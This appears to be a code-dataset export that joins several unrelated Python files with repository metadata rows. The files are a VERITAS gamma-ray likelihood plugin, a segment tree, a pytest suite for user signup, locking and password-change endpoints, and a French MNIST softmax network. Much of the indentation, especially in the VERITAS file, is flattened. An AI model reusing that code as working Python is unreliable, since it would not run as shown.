from threeML.utils.statistics.likelihood_functions import poisson_observed_poisson_background
__instrument_name = "VERITAS"
# Integrate the interpolation of the effective area for each bin in the residstribution matrix, then sum over the MC
# energies for the same bin, then renormalize the latter to be the same. The factor should be the same for all
# channels
# This is the data format v 1.0 agreed with Udara:
# * each run is in a different folder within the ROOT file, called run_XXXXXX
# * each run contains the following trees:
_trees_in_run = ['data_on', # Event list in the source region
'data_off', # Event list of the background region
'tRunSummary', # Summary info on the run (exposure, and so on, see below)
'gMeanEffectiveArea', # Effective area
'fAccZe_0', # relative acceptance with respect to the on-axis area
'hMigration' # Redistribution matrix (energy dispersion)
]
# In the data_* trees we have:
_columns_in_data_tree = ['Time', # it is the MJD of individual events
'Erec' # reconstructed energy. *****Note that there are some events with negative
# energy. Those are the events that we were unable to reconstruct energy.
# In VERITAS when we calculate significance some times we use these events,
# if we are not quoting the energy. Because failing the energy reconstruction
# does not mean that the event is a bad event. However, if we quote an energy
# band we do not use them.
'Xoff', # this is the X offset from the detector centre in degrees.
'Yoff', # this is the Y offset from the detector centre in degrees.
'theta2' # X^2 + Y^2 (i.e., off-axis radius squared)
]
class VERITASRun(object):
def __init__(self, root_file, run_name):
    """Load one VERITAS run (trees, migration matrix, effective area)
    from `root_file`, convert energies to keV, renormalize the migration
    matrix, and bin the ON/OFF event lists into counts spectra.

    Args:
        root_file (str): path to the ROOT file.
        run_name (str): name of the run folder inside the file (run_XXXXXX).
    """
    self._run_name = run_name
    # Read the data from the ROOT file
    with open_ROOT_file(root_file) as f:
        # Read first the TTrees (event lists and run summary) as ndarrays
        self._data_on = tree_to_ndarray(f.Get(run_name+'/data_on'))  # type: np.ndarray
        self._data_off = tree_to_ndarray(f.Get(run_name+'/data_off'))  # type: np.ndarray
        self._tRunSummary = np.squeeze(tree_to_ndarray(f.Get(run_name+'/tRunSummary')))  # type: np.ndarray
        # Now read the migration (energy dispersion) histogram
        self._log_recon_energies, \
        self._log_mc_energies, \
        self._hMigration = th2_to_arrays(f.Get(run_name + "/hMigration"))
        # Transform energies to keV (they are in TeV): +9 in log10
        self._log_recon_energies += 9
        self._log_mc_energies += 9
        # Bin widths and (linear-space) centers of the MC and recon energy bins
        self._dE = (10 ** self._log_mc_energies[1:] - 10 ** self._log_mc_energies[:-1])
        self._mc_energies_c = (10 ** self._log_mc_energies[1:] + 10 ** self._log_mc_energies[:-1]) / 2.0
        self._recon_energies_c = (10 ** self._log_recon_energies[1:] + 10 ** self._log_recon_energies[:-1]) / 2.0
        self._n_chan = self._log_recon_energies.shape[0] - 1
        # Remove all nans in the migration matrix by substituting them with 0.0
        idx = np.isfinite(self._hMigration)
        self._hMigration[~idx] = 0.0
        # Read the effective area TGraph
        tgraph = f.Get(run_name + "/gMeanEffectiveArea")
        self._log_eff_area_energies, self._eff_area = tgraph_to_arrays(tgraph)
        # Transform the effective area to cm2
        # (VEGAS convention per the original comment; factor 1e8)
        self._eff_area *= 1e8
        # Transform energies to keV
        self._log_eff_area_energies += 9
    # Use the effective area from the file to renormalize the migration matrix
    self._renorm_hMigration()
    # Exposure is tOn * (1 - tDeadtimeFrac)
    self._exposure = float(1 - self._tRunSummary['DeadTimeFracOn']) * float(self._tRunSummary['tOn'])
    # Members for generating OGIP equivalents
    self._mission = "VERITAS"
    self._instrument = "VERITAS"
    # Bin the source-region counts (Erec is in TeV -> *1e9 to keV)
    self._counts, _ = self._bin_counts_log(self._data_on['Erec'] * 1e9, self._log_recon_energies)
    # Bin the background-region counts
    self._bkg_counts, _ = self._bin_counts_log(self._data_off['Erec'] * 1e9, self._log_recon_energies)
    print("Read a %s x %s matrix, spectrum has %s bins, eff. area has %s elements" %
          (self._hMigration.shape[0], self._hMigration.shape[1], self._counts.shape[0], self._eff_area.shape[0]))
    # Background renormalization (ratio between source and background region)
    self._bkg_renorm = float(self._tRunSummary['OffNorm'])
    # Analysis energy range and the corresponding channel indexes
    self._start_energy = np.log10(175E6)  # 175 GeV in keV
    self._end_energy = np.log10(18E9)  # 18 TeV in keV
    self._first_chan = (np.abs(self._log_recon_energies-self._start_energy)).argmin()  # Values used by Giacomo: 61
    self._last_chan = (np.abs(self._log_recon_energies-self._end_energy)).argmin()  # Values used by Giacomo: 110
def _renorm_hMigration(self):
    """Renormalize the migration matrix row-by-row against the effective
    area curve read from the ROOT file.

    Each row sum of hMigration is (unnormalized effective area) x
    (expected photon counts from the simulated spectrum). Dividing the
    row sums by the expected counts and comparing with the file's
    effective area interpolated at the bin centers gives a per-row
    renormalization factor.

    Cleanup vs. the original: dead locals (v, mc_e1, mc_e2, emin, emax)
    and the commented-out alternate normalization were removed; the live
    computation is unchanged.
    """
    # Energies (keV) at which the effective area curve is tabulated
    energies_eff = (10 ** self._log_eff_area_energies)
    # Expected photon counts per reconstructed-energy bin, using the
    # spectrum assumed in the Monte Carlo simulation
    rc_e1 = 10 ** self._log_recon_energies[:-1]
    rc_e2 = 10 ** self._log_recon_energies[1:]
    expectation = self._simulated_spectrum(self._recon_energies_c) * (rc_e2 - rc_e1)
    # Row sums of the migration matrix (one per reconstructed-energy bin)
    v_new = np.sum(self._hMigration, axis=1)
    # Unnormalized effective area implied by the matrix
    avg1_new = v_new / expectation
    # Effective area from the file, interpolated at the recon bin centers
    avg2_new = np.interp(self._recon_energies_c, energies_eff, self._eff_area)
    # Per-row renormalization factor
    renorm_new = avg1_new / avg2_new
    hMigration_new = self._hMigration / renorm_new[:, None]
    # Rows with zero expectation/effective area yield non-finite factors;
    # zero those entries out
    hMigration_new[~np.isfinite(hMigration_new)] = 0
    # Effective-area systematic-error study knob (kept from the original):
    # uncomment to shift the matrix by the systematic uncertainty.
    # hMigration_new = hMigration_new - hMigration_new * 0.229
    self._hMigration = hMigration_new
@staticmethod
def _bin_counts_log(counts, log_bins):
energies_on_log = np.log10(np.array(counts))
# Substitute nans (due to negative energies in unreconstructed events)
energies_on_log[~np.isfinite(energies_on_log)] = -99
return np.histogram(energies_on_log, log_bins)
@property
def migration_matrix(self):
    """numpy.ndarray: renormalized energy-dispersion (migration) matrix."""
    return self._hMigration
@property
def total_counts(self):
    """Total source-region (ON) counts summed over all channels."""
    return np.sum(self._counts)
@property
def total_background_counts(self):
    """Total background-region (OFF) counts summed over all channels."""
    return np.sum(self._bkg_counts)
def display(self):
repr = "%s:\n" % self._run_name
repr += "%s src counts, %s bkg counts\n" % (np.sum(self._counts), np.sum(self._bkg_counts))
repr += "Exposure: %.2f s, on area / off area: %.2f\n" % (self._exposure, float(self._tRunSummary['OffNorm']))
failed_on_idx = (self._data_on['Erec'] <= 0)
failed_off_idx = (self._data_off['Erec'] <= 0)
repr += "Events with failed reconstruction: %i src, %i bkg" % (np.sum(failed_on_idx), np.sum(failed_off_idx))
print(repr)
# def _build_response(self):
#
# # Interpolate the effective area on the same bins of the migration matrix
# # NOTE: these are mid energies in log space
# mid_energies = (10**self._log_mc_energies[1:] + 10**self._log_mc_energies[:-1]) / 2.0 #type: np.ndarray
#
# log_mid_energies = np.log10(mid_energies)
#
# interpolated_effective_area = np.interp(log_mid_energies,
# self._log_eff_area_energies, self._eff_area,
# left=0, right=0)
#
# # Transform to cm2 from m2
# interpolated_effective_area *= 1e4
#
# self._interpolated_effective_area = interpolated_effective_area
#
# # Get response matrix, which is effective area times energy dispersion
# # matrix = self._hMigration * interpolated_effective_area
#
# matrix = self._hMigration
#
# # Put a lower limit different than zero to avoid problems downstream when convolving a model with the response
#
# # Energies in VERITAS files are in TeV, we need them in keV
#
# response = InstrumentResponse(matrix, (10**self._log_recon_energies) * 1e9, (10**self._log_mc_energies) * 1e9)
#
# return response
#
# def get_spectrum(self):
#
# spectrum = BinnedSpectrumWithDispersion(counts=self._counts,
# exposure=self._exposure,
# response=self._response,
# is_poisson=True,
# mission=self._mission,
# instrument=self._instrument)
#
# return spectrum
#
# def get_background_spectrum(self):
#
# # Renormalization for the background (on_area / off_area), so this is usually < 1
# bkg_renorm = self._bkg_renorm
#
# # by renormalizing the exposure of the background we account for the fact that the area is larger
# # (it is equivalent to introducing a renormalization)
# renormed_exposure = self._exposure / bkg_renorm
#
# background_spectrum = BinnedSpectrum(counts=self._bkg_counts,
# exposure=renormed_exposure,
# ebounds=self._response.ebounds,
# is_poisson=True,
# mission=self._mission,
# instrument=self._instrument)
#
# return background_spectrum
def _get_diff_flux_and_integral(self, like_model):
n_point_sources = like_model.get_number_of_point_sources()
# Make a function which will stack all point sources (OGIP do not support spatial dimension)
def differential_flux(energies):
fluxes = like_model.get_point_source_fluxes(0, energies)
# If we have only one point source, this will never be executed
for i in range(1, n_point_sources):
fluxes += like_model.get_point_source_fluxes(i, energies)
return fluxes
# The following integrates the diffFlux function using Simpson's rule
# This assume that the intervals e1,e2 are all small, which is guaranteed
# for any reasonable response matrix, given that e1 and e2 are Monte-Carlo
# energies. It also assumes that the function is smooth in the interval
# e1 - e2 and twice-differentiable, again reasonable on small intervals for
# decent models. It might fail for models with too sharp features, smaller
# than the size of the monte carlo interval.
def integral(e1, e2):
# Simpson's rule
return (e2 - e1) / 6.0 * (differential_flux(e1)
+ 4 * differential_flux((e1 + e2) / 2.0)
+ differential_flux(e2))
return differential_flux, integral
@staticmethod
def _simulated_spectrum(x):
return (x)**(-2.45)
@staticmethod
def _simulated_spectrum_f(e1, e2):
integral_f = lambda x: -3.0 / (x**0.5)
return integral_f(e2) - integral_f(e1)
@staticmethod
def _integrate(function, e1, e2):
integrals = []
for ee1, ee2 in zip(e1,e2):
grid = np.linspace(ee1, ee2, 30)
integrals.append(scipy.integrate.simps(function(grid), grid))
# integrals = map(lambda x:scipy.integrate.quad(function, x[0], x[1], epsrel=1e-2)[0], zip(e1, e2))
return np.array(integrals)
def get_log_like(self, like_model, fast=True):
# Reweight the response matrix
diff_flux, integral = self._get_diff_flux_and_integral(like_model)
e1 = 10**self._log_mc_energies[:-1]
e2 = 10**self._log_mc_energies[1:]
dE = (e2 - e1)
if not fast:
print 'Udara Debug not fast********'
this_spectrum = self._integrate(diff_flux, e1, e2) / dE # 1 / keV cm2 s
sim_spectrum = self._simulated_spectrum_f(e1, e2) / dE # 1 / keV cm2 s
else:
# print 'Udara Fast ***********************'
this_spectrum = diff_flux(self._mc_energies_c)
sim_spectrum = self._simulated_spectrum(self._mc_energies_c)
weight = this_spectrum / sim_spectrum # type: np.ndarray
# print("Sum of weight: %s" % np.sum(weight))
n_pred = np.zeros(self._n_chan)
for i in range(n_pred.shape[0]):
n_pred[i] = np.sum(self._hMigration[i, :] * weight) * self._exposure
log_like, _ = poisson_observed_poisson_background(self._counts, self._bkg_counts, self._bkg_renorm,
n_pred)
log_like_tot = np.sum(log_like[self._first_chan: self._last_chan + 1]) # type: float
return log_like_tot, locals()
class VERITASLike(PluginPrototype):
def __init__(self, name, veritas_root_data):
# Open file
f = ROOT.TFile(veritas_root_data)
try:
# Loop over the runs
keys = get_list_of_keys(f)
finally:
f.Close()
# Get the names of all runs included
run_names = filter(lambda x: x.find("run") == 0, keys)
self._runs_like = collections.OrderedDict()
for run_name in run_names:
# Build the VERITASRun class
this_run = VERITASRun(veritas_root_data, run_name)
this_run.display()
if this_run.total_counts == 0 or this_run.total_background_counts == 0:
custom_warnings.warn("%s has 0 source or bkg counts, cannot use it." % run_name)
continue
else:
# Get background spectrum and observation spectrum (with response)
# this_observation = this_run.get_spectrum()
# this_background = this_run.get_background_spectrum()
#
# self._runs_like[run_name] = DispersionSpectrumLike(run_name,
# this_observation,
# this_background)
#
# self._runs_like[run_name].set_active_measurements("c50-c130")
self._runs_like[run_name] = this_run
super(VERITASLike, self).__init__(name, {})
def rebin_on_background(self, *args, **kwargs):
for run in self._runs_like.values():
run.rebin_on_background(*args, **kwargs)
def rebin_on_source(self, *args, **kwargs):
for run in self._runs_like.values():
run.rebin_on_source(*args, **kwargs)
def set_model(self, likelihood_model_instance):
"""
Set the model to be used in the joint minimization. Must be a LikelihoodModel instance.
"""
# Set the model for all runs
self._likelihood_model = likelihood_model_instance # type: astromodels.Model
# for run in self._runs_like.values():
#
# run.set_model(likelihood_model_instance)
def get_log_like(self):
"""
Return the value of the log-likelihood with the current values for the
parameters
"""
# Collect the likelihood from each run
total = 0
total_sat = 0
for run in self._runs_like.values():
total += run.get_log_like(self._likelihood_model)[0]
return total
def inner_fit(self):
"""
This is used for the profile likelihood. Keeping fixed all parameters in the
LikelihoodModel, this method minimize the logLike over the remaining nuisance
parameters, i.e., the parameters belonging only to the model for this
particular detector. If there are no nuisance parameters, simply return the
logLike value.
"""
return self.get_log_like()
| [
"fkt8356@gmail.com"
] | fkt8356@gmail.com |
2eff427266939ed01872e9d20210444fb49759ed | 7966fa31437cc8a539621a5a0642ce24c1c9de50 | /PycharmProjects/segmentTree/sgrTree.py | 29d3a3b49750c8b91cbbe7e14c980ac9783aa1fe | [] | no_license | crystal30/DataStructure | 4f938508f4c60af9c5f8ec5520d5acedbe2dc90e | c55b0cfd2967a2221c27ed738e8de15034775945 | refs/heads/master | 2021-06-25T17:49:03.048853 | 2021-01-22T00:37:04 | 2021-01-22T00:37:04 | 192,374,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,804 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
class SegTree():
def __init__(self, data):
self.__data = data
self.__tree = [None]*len(data)*4
def getSize(self):
return len(self.__data)
def getIndex(self, index):
return self.getIndex(index)
# 左孩子节点
def __leftChild(self, index):
return index*2 + 1
# 右孩子节点
def __rightChild(self, index):
return index*2 + 2
#融合函数,这里 返回 两个list 相加
def merger(self, a,b):
return a+b
def tree(self):
self.__subTree(0,l=0, r = len(self.__data)-1)
def __subTree(self,index,l, r):
if l==r:
# self.__tree[index] = [self.__data[l]]
self.__tree[index] = self.__data[l]
return
else: # l<r
mid = (r+l) // 2
lChild = self.__leftChild(index)
rChild = self.__rightChild(index)
self.__subTree(lChild, l,mid)
self.__subTree(rChild, mid+1,r)
self.__tree[index] = self.merger(self.__tree[lChild], self.__tree[rChild])
#查询
def query(self,ql, qr):
return self.__query(0, 0, len(self.__data)-1, ql, qr)
def __query(self,treeIndex, l, r, ql, qr):
if l==ql and r == qr:
return self.__tree[treeIndex]
leftChild = self.__leftChild(treeIndex)
rightChild = self.__rightChild(treeIndex)
mid = (l+r) // 2
if qr <= mid:
return self.__query(leftChild, l, mid, ql, qr)
elif ql >= mid+1:
return self.__query(rightChild, mid+1, r, ql, qr)
if ql <= mid and qr > mid:
leftRe = self.__query(leftChild,l,mid,ql, mid)
rightRe = self.__query(rightChild, mid+1, r, mid+1, qr)
return self.merger(leftRe , rightRe)
#更新
def set(self,index,e):
self.__data[index] = e
self.__set(0, 0, len(self.__data)-1, index,e)
def __set(self,treeIndex, l, r, index ,e):
if l == r:
# self.__tree[treeIndex] = [e]
self.__tree[treeIndex] = e
# self.__tree[treeIndex] = [self.__data[l]]
return
mid = l + (r-l)//2
leftChild = self.__leftChild(treeIndex)
rightChild = self.__rightChild(treeIndex)
if index <= mid:
self.__set(leftChild,l,mid,index,e)
elif index >= mid+1:
self.__set(rightChild, mid+1, r, index, e)
self.__tree[treeIndex] = self.merger(self.__tree[leftChild], self.__tree[rightChild])
def __str__(self):
return str(self.__tree)
if __name__ == "__main__":
nums = [-2, 0, 3, -5, 2, -1]
seg = SegTree(nums)
seg.tree()
print(seg)
print(seg.query(2,3))
seg.set(2,5)
print(seg)
| [
"zhao_crystal@126.com"
] | zhao_crystal@126.com |
1aa628a816a9342365917b9540992c27ccc13114 | 69117983b1ca2b8dfd36050ac741b1b7dbc878fb | /TestCase/test_zuoye_zhuce.py | 68dd085c05d79adfca005476e45371d8ced9b5ac | [] | no_license | nigang123/api_auto_test | d7bbf62226e9d22baabe387c48f7093f047bebca | 3685a84f5b270945e54e97420f4db97b52bead9a | refs/heads/master | 2022-12-14T14:50:20.146989 | 2019-05-24T03:13:48 | 2019-05-24T03:13:48 | 183,154,902 | 0 | 0 | null | 2022-07-06T20:05:29 | 2019-04-24T05:33:36 | Python | UTF-8 | Python | false | false | 2,411 | py | from Common import Request, Assert, Tools
import allure
import pytest
phone = Tools.phone_num()
pwd = Tools.random_str_abc(2)+Tools.random_123(4)
rePwd = pwd
userName = Tools.random_str_abc(3)+Tools.random_123(2)
newPwd = pwd+Tools.random_123(1)
oldPwd = pwd
reNewPwd =newPwd
head = {}
request = Request.Request()
assertion = Assert.Assertions()
url = 'http://192.168.1.137:1811/'
@allure.feature("注册模块")
class Test_zhuce:
@allure.story("注册测试")
def test_zhuce(self):
req_json = {"phone": phone, 'pwd': pwd, "rePwd":rePwd, "userName": userName,}
zhuce_resp = request.post_request(url=url + 'user/signup', json=req_json)
resp_json = zhuce_resp.json()
assertion.assert_code(zhuce_resp.status_code, 200)
assertion.assert_in_text(resp_json['respBase'],'成功')
@allure.story("冻结用户")
def test_dongjie(self):
dongjie_resp = request.post_request(url=url + '/user/lock', params={'userName':userName},
headers= {'Content-Type':'application/x-www-form-urlencoded'})
resp_dict = dongjie_resp.json()
assertion.assert_code(dongjie_resp.status_code, 200)
assertion.assert_in_text(resp_dict['respDesc'], '成功')
@allure.story("解冻用户")
def test_jiedong(self):
jiedong_resp = request.post_request(url=url + '/user/unLock', params={'userName': userName},
headers={'Content-Type': 'application/x-www-form-urlencoded'})
resp_dict = jiedong_resp.json()
assertion.assert_code(jiedong_resp.status_code, 200)
assertion.assert_in_text(resp_dict['respDesc'], '成功')
@allure.story("登录")
def test_login(self):
login_resp = request.post_request(url=url + 'user/login', json={"pwd":pwd,"userName":userName})
resp_dict = login_resp.json()
assertion.assert_code(login_resp.status_code, 200)
assertion.assert_in_text(resp_dict['respDesc'], '成功')
@allure.story("修改密码")
def test_xiugai(self):
xiugai_resp = request.post_request(url=url + '/user/changepwd', json={"newPwd": newPwd, "oldPwd": oldPwd,'reNewPwd':reNewPwd,'userName':userName})
resp_dict = xiugai_resp.json()
assertion.assert_code(xiugai_resp.status_code, 200)
assertion.assert_in_text(resp_dict['respDesc'], '成功')
| [
"494578387@qq.com"
] | 494578387@qq.com |
fcbbdb5459685ee330bb844f8b43925ca46fd802 | 65ca852688354783630f1595853222f8ecc4668a | /RNASoftmaxTest.py | d7b2b6785060aa0b312dd58d9b37cc2b6c45fb9a | [] | no_license | RobertGodin/CodePython | f15190df24b6da9f53002aeb791b63ebe2996275 | fb051d2b627cf43d55944b5f09626eb618de7411 | refs/heads/master | 2023-02-07T06:45:45.007762 | 2023-02-04T15:54:59 | 2023-02-04T15:54:59 | 133,089,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,691 | py | # -*- coding: utf-8 -*-
# Implémentation d'un RNA par couche
# Deux types de couches : dense linéaire et activation
# Division des données en deux groupes : entrainement et test
# Exemple avec MNIST
import numpy as np
np.random.seed(42) # pour reproduire les mêmes résultats
import random
random.seed(42)
import matplotlib.pyplot as plt
import matplotlib as mpl
class Couche:
""" Classe abstraite qui représente une couche du RNA
X: np.array 2D de taille (1,n), entrée de la couche
Y: np.array 2D de taille (1,m), sortie de la couche
"""
def propager_une_couche(self,X):
""" Calculer la sortie Y pour une valeur de X
X : vecteur des variables prédictives
Les valeurs de X et Y sont stockées pour les autres traitements.
"""
def retropropager_une_couche(self,dJ_dY,taux,trace=False):
""" Calculer les dérivées par rapport à X et les autres paramètres à partir de dJ_dY
et mettre à jour les paramètres de la couche selon le taux spécifié.
dJ_dY : np.array(1,m), dérivées de J par rapport à la sortie Y
taux : float, le taux dans la descente de gradiant
retourne la dérivée de J par rapport à X
"""
class CoucheDenseLineaire(Couche):
""" Couche linéaire dense. Y=WX+B
"""
def __init__(self,n,m,init_W=None,init_B=None):
""" Initilalise les paramètres de la couche. W et B sont initialisés avec init_W et init_B lorsque spécifiés.
Sinon, des valeurs aléatoires sont générés pour W une distribution normale et B est initialisée avec des 0
si les paramètres init_W et init_B ne sont pas spécifiés.
L'initialization He est employée pour W
n : int, taille du vecteur d'entrée X
m : int, taille du vecteur de sortie Y
init_W : np.array, shape(n,m), valeur initiale optionnelle de W
init_B : np.array, shape(1,m), valeur initial optionnelle de B
"""
if init_W is None :
# Initialization He
self.W = np.random.randn(n,m) * np.sqrt(2/n)
else:
self.W = init_W
if init_B is None :
self.B = np.zeros((1,m))
else:
self.B = init_B
def propager_une_couche(self,X):
""" Fait la propagation de X et retourne Y=WX+B.
"""
self.X = X
self.Y = self.B + np.dot(self.X,self.W)
return self.Y
def retropropager_une_couche(self,dJ_dY,taux,trace=False):
""" Calculer les dérivées dJ_dW,dJ_dB,dJ_dX pour une couche dense linéaire et
mettre à jour les paramètres selon le taux spécifié
dJ_dY : np.array(1,2), dérivées de J par rapport à la sortie Y
taux : float, le taux dans la descente de gradiant
retourne la dérivée de J par rapport à X
"""
dJ_dW = np.dot(self.X.T,dJ_dY)
dJ_dB = dJ_dY
dJ_dX = np.dot(dJ_dY,self.W.T)
if trace:
print("dJ_dW:",dJ_dW)
print("dJ_dB:",dJ_dB)
print("dJ_dX:",dJ_dX)
# Metre à jour les paramètres W et B
self.W -= taux * dJ_dW
self.B -= taux * dJ_dB
if trace:
print("W modifié:",self.W)
print("B modifié:",self.B)
return dJ_dX
class CoucheActivation(Couche):
""" Couche d'activation selon une fonction spécifiée dans le constructeur
"""
def __init__(self,fonction_activation,derivee):
""" Initialise la fonction_activation ainsi que la dérivée
fonction_activation: une fonction qui prend chacune des valeurs de X et
retourne Y=fonction_activation(X)
derivee: une fonction qui calcule la dérivée la fonction_activation
"""
self.fonction_activation = fonction_activation
self.derivee = derivee
def propager_une_couche(self,X):
""" Retourne Y=fonction_activation(X)
"""
self.X = X
self.Y = self.fonction_activation(self.X)
return self.Y
def retropropager_une_couche(self,dJ_dY,taux,trace=False):
""" Retourne la dérivée de la fonction d'activation par rapport l'entrée X
Le taux n'est pas utilisé parce qu'il n'y a pas de paramètres à modifier dans ce genre de couche
"""
return self.derivee(self.X) * dJ_dY
class CoucheSoftmax(Couche):
""" Couche d'activation softmax
"""
def __init__(self,n):
"""
n: nombre d'entrées et de sorties
"""
self.n = n
def propager_une_couche(self,X):
""" Calcule les activations softmax pour chacunes de entrées xi
"""
self.X = X
X_decale = X-np.max(X) # Pour la stabilité numérique, les valeurs sont décalées de max(X)
exponentielles = np.exp(X_decale)
self.Y = exponentielles / np.sum(exponentielles)
return self.Y
def retropropager_une_couche(self,dJ_dY,taux,trace=False):
""" Retourne la dérivée de la fonction d'activation par rapport l'entrée X
Le taux n'est pas utilisé parce qu'il n'y a pas de paramètres à modifier dans ce genre de couche
"""
return np.dot(dJ_dY,self.Y.T*(np.identity(self.n)-self.Y))
def delta_kroneker(i,j):
if i==j :
return 1
else:
return 0
def erreur_quadratique(y_prediction,y):
""" Retourne l'erreur quadratique entre la prédiction y_prediction et la valeur attendue y
"""
return np.sum(np.power(y_prediction-y,2))
def d_erreur_quadratique(y_prediction,y):
return 2*(y_prediction-y)
def entropie_croisee(y_prediction,y):
""" Retourne l'entropie croisée entre la prédiction y_prediction et la valeur attendue y
"""
return -np.sum(y*np.log(y_prediction))
def d_entropie_croisee(y_prediction,y):
return -(y/y_prediction)
class ReseauMultiCouches:
""" Réseau mutli-couche formé par une séquence de Couches
couches : liste de Couches du RNA
cout : fonction qui calcule de cout J
derivee_cout: dérivée de la fonction de cout
"""
def __init__(self):
self.couches = []
self.cout = None
self.derivee_cout = None
def ajouter_couche(self,couche):
self.couches.append(couche)
def specifier_J(self,cout,derivee_cout):
""" Spécifier la fonction de coût J et sa dérivée
"""
self.cout = cout
self.derivee_cout = derivee_cout
def propagation_donnees_X(self,donnees_X,trace=False):
""" Prédire Y pour chacune des observations dans donnees_X)
donnees_X : np.array 3D des valeurs de X pour chacune des observations
chacun des X est un np.array 2D de taille (1,n)
"""
nb_observations = len(donnees_X)
predictions_Y = []
for indice_observation in range(nb_observations):
# XY_propage : contient la valeur de X de la couche courante qui correspond
# à la valeur de Y de la couche précédente
XY_propage = donnees_X[indice_observation]
if trace:
print("Valeur de X initiale:",XY_propage)
for couche in self.couches:
XY_propage = couche.propager_une_couche(XY_propage)
if trace:
print("Valeur de Y après propagation pour la couche:",XY_propage)
predictions_Y.append(XY_propage)
return predictions_Y
def metriques(self, donnees_X,donnees_Y):
"""Retourne le cout moyen, la proportion de bons résultats
Choisit l'indice de la classe dont l'activation est la plus grande"""
erreur_quadratique = 0
nb_correct = 0
predictions_Y=self.propagation_donnees_X(donnees_X)
for indice in range(len(donnees_Y)):
erreur_quadratique += self.cout(predictions_Y[indice],donnees_Y[indice])
classe_predite = np.argmax(predictions_Y[indice])
if donnees_Y[indice][0,classe_predite] == 1:
nb_correct+=1
return (erreur_quadratique/len(donnees_Y),nb_correct/len(donnees_Y))
def entrainer_descente_gradiant_stochastique(self,donnees_ent_X,donnees_ent_Y,donnees_test_X,donnees_test_Y,
nb_epochs,taux,trace=False,graph_cout=False):
""" Entrainer le réseau par descente de gradiant stochastique (une observation à la fois)
donnees_ent_X : np.array 3D des valeurs de X pour chacune des observations d'entrainement
chacun des X est un np.array 2D de taille (1,n)
donnees_ent_Y : np.array 3D des valeurs de Y pour chacune des observations d'entrainement
chacun des Y est un np.array 2D de taille (1,m)
donnees_test_X : np.array 3D des valeurs de X pour chacune des observations de test
chacun des X est un np.array 2D de taille (1,n)
donnees_test_Y : np.array 3D des valeurs de Y pour chacune des observations de test
chacun des Y est un np.array 2D de taille (1,m)
nb_epochs : nombre de cycle de passage sur les données d'entainement
taux : taux dans la descente de gradiant
trace : Boolean, True pour afficher une trace des calculs effectués sur les paramètres
graph_cout : Boolean, True pur afficher un graphique de l'évolution du coût
"""
nb_observations = len(donnees_ent_X)
if graph_cout :
liste_cout_moyen_ent = []
liste_ok_ent = []
liste_cout_moyen_test = []
liste_ok_test = []
# Boucle d'entrainement principale, nb_epochs fois
for cycle in range(nb_epochs):
cout_total = 0
# Descente de gradiant stochastique, une observation à la fois
for indice_observation in range(nb_observations):
# Propagation avant pour une observation X
# XY_propage : contient la valeur de X de la couche courante qui correspond
# à la valeur de Y de la couche précédente
XY_propage = donnees_ent_X[indice_observation]
if trace:
print("Valeur de X initiale:",XY_propage)
for couche in self.couches:
XY_propage = couche.propager_une_couche(XY_propage)
if trace:
print("Valeur de Y après propagation pour la couche:",XY_propage)
# Calcul du coût pour une observation
cout_total += self.cout(XY_propage,donnees_ent_Y[indice_observation])
# Rétropropagation pour une observation
# dJ_dX_dJ_dY représente la valeur de la dérivée dJ_dX de la couche suivante
# qui correspond à dJ_dY de la couche en cours de traitement
dJ_dX_dJ_dY = self.derivee_cout(XY_propage,donnees_ent_Y[indice_observation])
if trace :
print("dJ_dY pour la couche finale:",dJ_dX_dJ_dY)
for couche in reversed(self.couches):
dJ_dX_dJ_dY = couche.retropropager_une_couche(dJ_dX_dJ_dY,taux,trace)
# Calculer et afficher le coût moyen pour une epoch
cout_moyen = cout_total/nb_observations
if graph_cout:
print(f'-------- > epoch {cycle+1}: coût moyen {cout_moyen}')
cout_ent,ok_ent = self.metriques(donnees_ent_X,donnees_ent_Y)
cout_test,ok_test = self.metriques(donnees_test_X,donnees_test_Y)
liste_cout_moyen_ent.append(cout_ent)
liste_ok_ent.append(ok_ent)
liste_cout_moyen_test.append(cout_test)
liste_ok_test.append(ok_test)
# Affichage du graphique d'évolution de l'erreur quadratique
if graph_cout:
plt.plot(np.arange(0,nb_epochs),liste_cout_moyen_ent,label='Erreur entraînement')
plt.plot(np.arange(0,nb_epochs),liste_cout_moyen_test,label='Erreur test')
plt.title("Evolution du coût")
plt.xlabel('epoch')
plt.ylabel('moyenne par observation')
plt.legend(loc='upper center')
plt.show()
plt.plot(np.arange(0,nb_epochs),liste_ok_ent,label='entraînement')
plt.plot(np.arange(0,nb_epochs),liste_ok_test,label='test')
plt.title("Evolution du taux de bonnes prédictions")
plt.xlabel('epoch')
plt.ylabel('moyenne par observation')
plt.legend(loc='upper center')
plt.show()
def tanh(x):
return np.tanh(x)
def derivee_tanh(x):
return 1-np.tanh(x)**2
def sigmoide(x):
return 1.0/(1.0+np.exp(-x))
def derivee_sigmoide(x):
return sigmoide(x)*(1-sigmoide(x))
def relu(x):
return np.maximum(x,0)
def derivee_relu(x):
return np.heaviside(x,1)
def bitmap(classe):
""" Representer l'entier de classe par un vecteur bitmap (10,1)
classe : entier (entre 0 et 9 qui représente la classe de l'observation"""
e = np.zeros((1,10))
e[0,classe] = 1.0
return e
# Chargement des données de MNIST
import pickle, gzip
fichier_donnees = gzip.open(r"mnist.pkl.gz", 'rb')
donnees_ent, donnees_validation, donnees_test = pickle.load(fichier_donnees, encoding='latin1')
fichier_donnees.close()
donnees_ent_X = donnees_ent[0].reshape((50000,1,784))
donnees_ent_Y = [bitmap(y) for y in donnees_ent[1]] # Encodgae bitmap de l'entier (one hot encoding)
donnees_test_X = donnees_test[0].reshape((10000,1,784))
donnees_test_Y = [bitmap(y) for y in donnees_test[1]] # Encodgae bitmap de l'entier (one hot encoding)
# Définir l'architecture du RNA
# Deux couches denses linéaires suivies chacune d'une couche d'activation sigmoide
un_RNA = ReseauMultiCouches()
un_RNA.specifier_J(entropie_croisee,d_entropie_croisee)
un_RNA.ajouter_couche(CoucheDenseLineaire(784,30))
un_RNA.ajouter_couche(CoucheActivation(relu,derivee_relu))
un_RNA.ajouter_couche(CoucheDenseLineaire(30,10))
un_RNA.ajouter_couche(CoucheSoftmax(10))
# Entrainer le RNA
un_RNA.entrainer_descente_gradiant_stochastique(donnees_ent_X,donnees_ent_Y,donnees_test_X,donnees_test_Y,
nb_epochs=30,taux=0.003,trace = False, graph_cout = True)
for i in range(3):
print("Classe de l'image",i,":",donnees_ent_Y[i])
print("Prédiction softmax:",un_RNA.propagation_donnees_X(donnees_ent_X[i]))
